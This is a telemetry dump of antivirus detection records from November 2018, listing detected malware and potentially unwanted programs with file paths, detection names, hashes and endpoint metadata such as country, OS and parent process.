  Row(detection=Row(filename='glossary_drptdes-1304594.html', filepath='C:\\Program Files\\Corel\\CorelDRAW Graphics Suite X7\\Languages\\EN\\Help\\Draw\\popups\\glossary_drptdes-1304594.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='ec1737665bc0aa45cf0dc832ed16c5515cd00e5a115c4927184983d9ef1ec904', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=815264, timestamp='2018-11-01T17:47:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tobii_firmware_upgrade.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Tobii\\Service\\tobii_firmware_upgrade.dll', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='a1d6b8cd7cb92d828f99be298044c4d07386481636387045607f4c73a15ab4b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:56:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105935-a46889ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105935-A46889AD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092451-bd3caf8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e97d068\\AVSCAN-20181101-092410-B6C41C15\\AVSCAN-20181101-092451-BD3CAF8C', filesize=768000, name='TR/Dropper.Gen.#M1.#R1'), hash='d1a821971ed8642d258ee65db27b91fddd28d902f9ec4e17322a39ee7beb6b5d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:24:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T03:52:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-080814-805ff83f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_444c4ab4\\AVSCAN-20181101-075651-38978B97\\AVSCAN-20181101-080814-805FF83F', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:08:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d0311c978d131ded69d61d1f141afc0eb99b6c978c7bfda575032f5b44603204', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D0311C978D131DED69D61D1F141AFC0EB99B6C978C7BFDA575032F5B44603204', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d0311c978d131ded69d61d1f141afc0eb99b6c978c7bfda575032f5b44603204', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,tjuqn', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111159-023d2464', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111159-023D2464', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T18:59:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:10:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205244-265b3ea6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7e9c7340\\AVSCAN-20181101-205233-2410F55F\\AVSCAN-20181101-205244-265B3EA6', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:52:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='physiologie obstetricale ide-sfme tc.exe', filepath='D:\\PHYSIOLOGIE OBSTETRICALE IDE-SFME TC.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='brh.dll', filepath='C:\\Windows\\Temp\\nsm818.tmp\\brh.dll', filesize=960000, name='HEUR/AGEN.1034999.#M1.#R1'), hash='7643b17b3d571bd272f3284bf57eec71dac66c207f7602b0f063aec1c38aea92', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=9773272, timestamp='2018-11-01T19:17:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160353-26e0032c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-160334-245D59E9\\AVSCAN-20181101-160353-26E0032C', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:03:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0c3fee6d898da44487c58a055117969cfca1ad5d0a881bd45621e02a5664ef3e.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0C3FEE6D898DA44487C58A055117969CFCA1AD5D0A881BD45621E02A5664EF3E.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0c3fee6d898da44487c58a055117969cfca1ad5d0a881bd45621e02a5664ef3e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:15:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\2PTJ72TG\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T19:06:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-153334-cf17d2ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1da8a17c\\AVSCAN-20181101-153226-C7EF38FC\\AVSCAN-20181101-153334-CF17D2EF', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='PA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T21:33:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='137dfd76925409093786028c56d752878d82127985118a6574d3a1582c3530dc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\137DFD76925409093786028C56D752878D82127985118A6574D3A1582C3530DC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='137dfd76925409093786028c56d752878d82127985118a6574d3a1582c3530dc', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:08:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='3a173130e2c67f15e9f0e507ab0cd7ad8366817305d36779e1f0589e0aeefce7', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='894069e4-2ab1-6476-e639-2e3a6e0b6ba6.exe', filepath='D:\\{288e20a1-fe14-898a-5150-50d1e7af5e64}\\894069e4-2ab1-6476-e639-2e3a6e0b6ba6.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T15:24:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:27:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\is-PR65V.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline='\\\\\\/uac', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=14544792, timestamp='2018-11-01T21:13:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114301-7bc97e3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b33d02c7\\AVSCAN-20181101-112906-89C620F7\\AVSCAN-20181101-114301-7BC97E3D', filesize=380000, name='PUA/MyWebSearch.Gen.#M1.#R1'), hash='152da9afd217d12b308a9ea213795cd2c3ea4636b4796140ee8177e744966031', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:43:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111622-2ef29382', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ae1d9bb\\AVSCAN-20181101-111531-26FF4912\\AVSCAN-20181101-111622-2EF29382', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005239-0c129702', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234829-DD2407AD\\AVSCAN-20181102-005239-0C129702', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000083b', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp0000083b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T09:20:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aidl.exe', filepath='F:\\FILES 1\\Lenovo_A526\\Lenovo_A526_ROW_S031_140307_(by_xdafirmware.com)\\Lenovo_A526_ROW_S031_140307\\SN Write Tool v2.1444.00\\Android\\aidl.exe', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='05c5b03a44952e053fda864b24ad5cf551482d215099a65373b20faa4b4a59bd', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:22:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[4].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[4].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0126997.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0126997.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:31:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='f:\\nuova cartella (2)\\mcneel rhinoceros 6 6.1.18023.13161\\patch\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T12:13:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114346-576edc55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-114343-56C9B1AE\\AVSCAN-20181101-114346-576EDC55', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:11:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150526-cae3eb40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150526-CAE3EB40', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='attestati sicurezza.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\ATTESTATI SICUREZZA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\Hasani\\AppData\\Local\\Temp\\2g4egfrte5v\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M2.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:18:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esempi grafici e pivot.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Esercizi Excel\\Esempi Grafici e Pivot.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\Program Files\\Pure Codec\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:40:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='689342.exe', filepath='J:\\689342.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R4205'), hash='ed139557bf929c41df2cdcbf76798223f60d07b15816ab7cada3787008faf3cc', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T16:52:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tarbawy1.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa9620.34606\\tarbawy\\Tarbawy1.exe', filesize=3072000, name='TR/VBCrypt.gwtfm.#M1.#R1'), hash='8ae0ac96a2953b547b712807daa8a8d2b66bf59936f3060f93e9f7154d03f8bc', metadata=Row(cmdline='\\\\\\"F:\\\\\\\\tarbawy1.zip\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2219736, timestamp='2018-11-01T11:36:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212436-f4cec606', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212436-F4CEC606', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194407-38963657', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194407-38963657', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='test informatica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\ENGIM\\TEST informatica.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:23:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\003agpkqjc3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:14:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sop mh.exe', filepath='F:\\\xa0\\sop mh\\sop mh.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212112-d71ebae0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212112-D71EBAE0', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:21:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='934fca9c1ec47f4cce1957f6c45fe39dca454c6b82744a4a53924878740b7408', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\934FCA9C1EC47F4CCE1957F6C45FE39DCA454C6B82744A4A53924878740B7408', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='934fca9c1ec47f4cce1957f6c45fe39dca454c6b82744a4a53924878740b7408', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:10:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c065a55abfd0f3bf7e8ab8c5b5c2538fe8c921e23e8c055295af1bdbd282338c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-11.available\\Avira\\C065A55ABFD0F3BF7E8AB8C5B5C2538FE8C921E23E8C055295AF1BDBD282338C', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='c065a55abfd0f3bf7e8ab8c5b5c2538fe8c921e23e8c055295af1bdbd282338c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:53:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='synctask.exe', filepath='C:\\Users\\X\\AppData\\Local\\29d4af865fc1c2f21c02365364e4bd9d\\synctask.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='e4b6c38e78ff4fc0d5fbe2998c3558522f1186a370f41cc0a1dd516bb4c88c0b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:02Z'), dt=datetime.date(2018, 11, 1)),
